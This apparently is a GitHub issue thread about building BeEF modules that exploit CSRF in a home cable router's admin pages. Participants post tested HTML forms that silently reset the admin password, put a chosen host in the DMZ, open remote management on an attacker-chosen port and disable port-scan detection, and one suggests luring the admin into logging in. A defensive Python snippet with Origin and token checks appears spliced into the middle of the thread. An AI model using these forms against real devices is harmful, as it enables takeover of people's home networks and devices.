Closed n0x00 closed 12 years ago
Thanks for this.
I've added a module for this in commit 771d6d60f9cb077c62e6d163e3ac7e1a8c89576f. Are you able to confirm it works?
You can use 3x backticks (```) to start and end code sections.
Like this
Sweet, I am sure, but just because you asked and it's been about 6 weeks since I played with it, I'll double-check tonight :)
I'm not sure how I would incorporate it into BeEF; I'm new to Git and imagine there are people more fluent at coding than me.
Three backticks! Got it :)
It's already incorporated into BeEF :)
I'm closing this issue. Please let me know if the BeEF module works.
Hah, wicked! Here I was making a screeny for you. I'll test it now!
PoC - http://thegentlemanhackersclub.com/verdhehoes_cha_cha_cha/SuperHubCSRF/SuperHub-CSRF.html
Hey, it doesn't want to work with that module, mate... I had tried it a few times and then ran the HTML created to replicate it. I'll paste it in here. This one has a submit value that the other doesn't; perhaps that's my fault, but the code below works 100% every time as of this morning (recreating the attack):

```html
<html>
<body>
<form action="http://192.168.100.1/goform/RgSecurity" method="POST">
<input type="hidden" name="NetgearPassword" value="sneaky" />
<input type="hidden" name="NetgearPasswordReEnter" value="sneaky" />
<input type="hidden" name="RestoreFactoryNo" value="0x00" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
```
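The forms in this thread succeed because the router's `/goform/` handlers accept any POST that arrives with the admin's session cookie, with no check on where the form was submitted from. As an added example (not BeEF's code and not the router's firmware), the following Python shows the two server-side guards that would stop such a request for the `/goform/RgSecurity` endpoint: an Origin/Referer check against the router's own address and a per-session synchronizer token. The `csrf_token` field name, the `SESSION` cookie and the in-memory token store are assumptions made up for the example.

```python
"""Defensive checks for a /goform/RgSecurity-style password-change endpoint."""
import hmac
import secrets
from urllib.parse import parse_qs, urlparse

ROUTER_HOST = "192.168.100.1"   # address used by the PoC forms in this thread
SESSION_TOKENS = {}             # constructed in-memory store: session id -> token


def issue_token(session_id):
    """Mint a fresh CSRF token for a logged-in admin session and remember it."""
    token = secrets.token_hex(16)
    SESSION_TOKENS[session_id] = token
    return token


def source_allowed(headers):
    """Allow only requests whose Origin (or Referer, if Origin is absent) is the router."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # fail closed: no provenance header, no state change
    return urlparse(source).hostname == ROUTER_HOST


def token_valid(session_id, body):
    """Constant-time compare of the submitted csrf_token against the session's token."""
    expected = SESSION_TOKENS.get(session_id)
    submitted = parse_qs(body).get("csrf_token", [""])[0]
    return expected is not None and hmac.compare_digest(expected, submitted)


def handle_rg_security(headers, cookies, body):
    """Return (status, reason) for a POST to /goform/RgSecurity."""
    session_id = cookies.get("SESSION")
    if session_id not in SESSION_TOKENS:
        return 401, "not logged in"
    if not source_allowed(headers):
        return 403, "cross-site request"
    if not token_valid(session_id, body):
        return 403, "missing or wrong csrf token"
    fields = parse_qs(body)
    if fields.get("NetgearPassword") != fields.get("NetgearPasswordReEnter"):
        return 400, "passwords differ"
    return 200, "password changed"
```

A form served by the router itself would carry the token as a hidden input; the cross-site form above carries none and comes from a foreign origin, so it fails both guards.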
Thanks for testing.
Were you logged in to the router?
The submit tag shouldn't make a difference.
The default IP address for the module is http://192.168.1.254/ - which is probably the problem. This has now been fixed. Did you change it to http://192.168.100.1/ when you were testing?
The request used by the BeEF module is exactly the same as the request used in your video, with one exception: it contains two "/" characters, which might also be the issue, i.e. http://192.168.100.1//goform/RgSecurity
Try submitting the IP address without the trailing slash, i.e. http://192.168.100.1
I did change the address, yes. I'm sure I was logged in (I didn't have it going through Burp but will do until we get this).
I also tried to change RgSecurity to RgSecurity.asp to see if that worked, but I'll have a tinker.
I just locked myself out of it, hah :/. I'll keep you posted.
Cool.
I removed the trailing slash and it works :)
Another note: this whole device is vulnerable to CSRF; I just figured this would be the most used/wanted feature. Cool!
Sweet. Thanks for testing.
I've fixed the issue with the duplicate slash (//).
For BeEF router CSRF modules we generally stick to payloads which:
I'll have a crack at them tonight!
To DMZ a host: you see the value '3' is the last octet of the class C (IP).

```html
<html>
<body>
<form action="http://192.168.100.1/goform/RgDmzHost" method="POST">
<input type="hidden" name="cbNetgearWanBlocking" value="0x10" />
<input type="hidden" name="DmzHostIP3" value="3" />
<input type="hidden" name="NetgearMtuSize" value="0" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
```
-Tested :)
Enable Remote Management - port 8080 - change the value 8080 to your own port.

```html
<html>
<body>
<form action="http://192.168.100.1/goform/RgVMRemoteManagementRes" method="POST">
<input type="hidden" name="NetgearVMRmEnable" value="0x01" />
<input type="hidden" name="NetgearVMRmPortNumber" value="8080" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
```
Disable all Firewalls and Filtering services:

Firewall Features
- Ipsec PassThrough
- PPTP PassThrough
- Multicast
- Port Scan Detection
- IP Flood Detection

Web Features
- Filter Proxy
- Filter Cookies
- Filter Java Applet
- Filter ActiveX
- Filter Popup Windows
- Block Fragmented IP Packets

Sweet.

```html
<html>
<body>
<form action="http://192.168.100.1/goform/RgServices" method="POST">
<input type="hidden" name="cbPortScanDetection" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>
```
-Tested :)
I had tested this at home; it works.
It will only work when the admin is logged in, but if you could redirect web pages to the router perhaps he'll log in just to see WTF... Can't seem to post HTML in here; pre isn't working?! Anyone help? I'll post the code.